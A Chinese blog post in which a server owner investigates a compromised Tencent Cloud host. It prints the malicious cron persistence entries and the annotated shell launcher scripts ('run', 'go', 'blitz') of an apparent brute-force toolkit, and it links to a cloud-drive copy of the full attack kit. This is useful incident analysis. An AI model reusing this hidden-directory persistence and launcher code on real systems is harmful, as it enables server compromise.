解决方法来自腾讯客服

https://cloud.tencent.com/document/product/296/9604 ,这是我们给您的建议,建议您排查一下您服务器的情况。

 

先执行一下 crontab -l,查看定时任务:

[root@VM-0-14-centos c]# crontab -l
# Persistence entries found on the compromised host. Two hidden locations are
# used: /root/.configrc4/ and /tmp/.X291-unix/.rsync/ (the latter resembles the
# naming of the X11 socket directory under /tmp). All output is discarded.
# 01:01 on every even day of the month.
1 1 */2 * * /root/.configrc4/a/upd>/dev/null 2>&1
# @reboot re-launches the same files after a restart, so removing only the
# cron lines without the files on disk would not be sufficient.
@reboot /root/.configrc4/a/upd>/dev/null 2>&1
# 08:05 every Sunday.
5 8 * * 0 /root/.configrc4/b/sync>/dev/null 2>&1
@reboot /root/.configrc4/b/sync>/dev/null 2>&1
# Midnight on every third day of the month; launches the stub shown below.
0 0 */3 * * /tmp/.X291-unix/.rsync/c/aptitude>/dev/null 2>&1

查看该脚本的内容:

[root@VM-0-14-centos c]# cat /tmp/.X291-unix/.rsync/c/aptitude
#!/bin/sh
# Cron-launched stub (see the "0 0 */3 * *" entry): change into the hidden
# toolkit directory and start ./run with all output discarded.
# Note: "&>" is a bash redirection; under a strict POSIX sh the line is
# parsed as "./run &" followed by a bare ">/dev/null", so run is started
# (in the background) either way.
cd /tmp/.X291-unix/.rsync/c
./run &>/dev/null

 

执行 cat run,显示如下内容:

#!/bin/bash
# Launcher stage of the toolkit found under /tmp/.X291-unix/.rsync/c.
# It decides, from CPU count and architecture, whether and when to start ./go.
# PR is set to 1 and then immediately overwritten with the number of
# "model name" lines in /proc/cpuinfo (on x86 this equals the logical CPU
# count; on platforms without that line it becomes 0).
PR=1
PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=`uname -m`
if [ "$ARCH" == "x86_64" ]; then
        # x86_64 host with fewer than 7 logical CPUs: stop any previous
        # instance (./stop is not included in this dump), wait a random
        # 0-239 s, then start ./go detached. The random delay presumably
        # staggers start times across infected hosts — confirm.
        if [ $PR -lt 7 ]; then
                sleep 15
                ./stop
                sleep 3
                RANGE=240
                s=$RANDOM
                let "s %= $RANGE"
                sleep $s
                #nohup ./golan >>/dev/null &
                #sleep 20m && 
                nohup ./go >>/dev/null &
        fi
        # x86_64 host with more than 7 logical CPUs: every action here is
        # commented out, so only a 3 s sleep runs and nothing is launched.
        # A host with exactly 7 CPUs matches neither branch.
        if [ $PR -gt 7 ]; then
                #sleep 15
                #./stop
                sleep 3
                #nohup ./golan >>/dev/null &
        fi
else
        # Any other architecture: start ./go immediately, without ./stop.
        # The commented-out ./golan lines hint at an alternate payload name
        # that is not present in this dump.
        #nohup ./golan >>/dev/null &
        #sleep 20m && 
        nohup ./go >>/dev/null &
fi

查看go脚本:

[root@VM-0-14-centos c]# cat go
#!/bin/bash
# Worker loop of the toolkit: repeatedly runs ./blitz with a thread count
# chosen by architecture, and throttles or calls ./stop when blitz keeps
# exiting early.
# `pwd` followed by cd into it is a no-op; the script relies on the caller
# (./run) having already changed into the toolkit directory.
dir=`pwd`
cd $dir

# Default thread count, lowered on ARM and raised by one on 32-bit x86.
# Note that ./blitz (shown below) only dispatches for i686 and x86_64, so
# the ARM value never reaches a real binary.
threads=515

ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
        threads=75
fi

if [[ "$ARCH"  == "i686" ]]; then
        threads=516
fi

# Counts blitz runs that finished in under 180 s; it is never reset.
cont=1

                while :
                do
                start=$(date +%s)
                # Reset the working files from the previous iteration.
                touch v
                rm -rf p
                rm -rf ip
                rm -rf xtr*
                rm -rf a a.*
                rm -rf b b.*
                # The same two strings are appended twice each to c and d on
                # every pass. "257.287.563.234" has octets above 255 and is
                # therefore not a valid IPv4 address; its purpose is unclear
                # from this dump (possibly a marker or decoy).
                echo "257.287.563.234" >> c
                echo "257.287.563.234" >> c
                echo "sdaferthqhr34312asdfa" >> d
                echo "sdaferthqhr34312asdfa" >> d

                # Random 1-30 s pause ($[ ] is the obsolete arithmetic form),
                # then run ./blitz for at most 6 hours. The files p and ip are
                # passed as positional arguments although they were just
                # deleted, so presumably blitz creates them — confirm against
                # the binary.
                sleep $[ ( $RANDOM % 30 )  + 1 ]s
                timeout 6h ./blitz -t $threads -f 1 -s 12 -S 8 -p 0 -d 1 p ip
                sleep 3
                end=$(date +%s)

                # If blitz exited in under 180 s, back off: 50 fewer threads
                # next time and one more short run counted. Below 80 threads
                # or after more than 6 short runs, ./stop (not in this dump)
                # is called; nothing here breaks the loop, so termination
                # depends on ./stop killing this process.
                if [[ $(($end-$start))  -lt "180" ]]; then
                        let threads=threads-50
                        let cont=cont+1
                        if [[ $(($threads))  -lt "80" ]]; then
                                                ./stop
                        fi
                        if [[ $(($cont))  -gt "6" ]]; then
                                                ./stop
                        fi
                fi

                # Cleanup. "rm -rf /tmp/t*" also deletes any unrelated file
                # or directory in /tmp whose name starts with "t".
                rm -rf xtr*
                rm -rf ip
                rm -rf p
                rm -rf .out
                rm -rf /tmp/t*
                done
# Unreachable: the loop above never terminates on its own.
exit 0
[root@VM-0-14-centos c]# cat blitz
#!/bin/bash
# Architecture dispatcher: runs the 32- or 64-bit build of blitz from the
# script's own directory, forwarding all arguments. Only i686 and x86_64 are
# handled; on any other architecture (including ARM, which ./go explicitly
# configures) nothing is executed and the script exits 0.
# $* is unquoted, so arguments containing whitespace would be re-split.
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
        $SCRIPT_PATH/blitz32 $*
elif [ "$ARCH" == "x86_64" ];   then
        $SCRIPT_PATH/blitz64 $*
fi

 

再执行 netstat -ano | egrep "tcp|udp",查看网络连接情况:

 

完整的攻击代码我已经保存,有空的时候再研究一下这些坏人是怎么做的!

下载地址:

https://www.aliyundrive.com/s/sS87xUzEmPP
